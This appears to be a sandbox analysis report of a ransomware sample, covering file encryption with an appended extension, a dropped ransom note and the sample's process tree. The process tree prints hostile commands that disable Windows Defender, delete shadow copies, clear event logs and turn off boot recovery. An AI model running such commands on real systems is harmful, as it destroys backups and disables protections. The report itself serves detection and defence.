| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\networkmanifest.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\ribbon.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-24.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\es-ES\msdaprsr.dll.mui.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\WideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\TimerMedTile.contrast-black_scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected.svg.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AgAAAAIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\Print.scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_OgAAADoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME.txt.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_NgAAADYAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\SmallTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-30.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1851_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\Dismiss.scale-80.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\T3yp_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL081.XML.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_GgAAABoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-black_scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Icon.targetsize-32.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7260_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EgAAABIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_K_COL.HXK.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_13705" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_13705" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_13705" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\T3yp_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
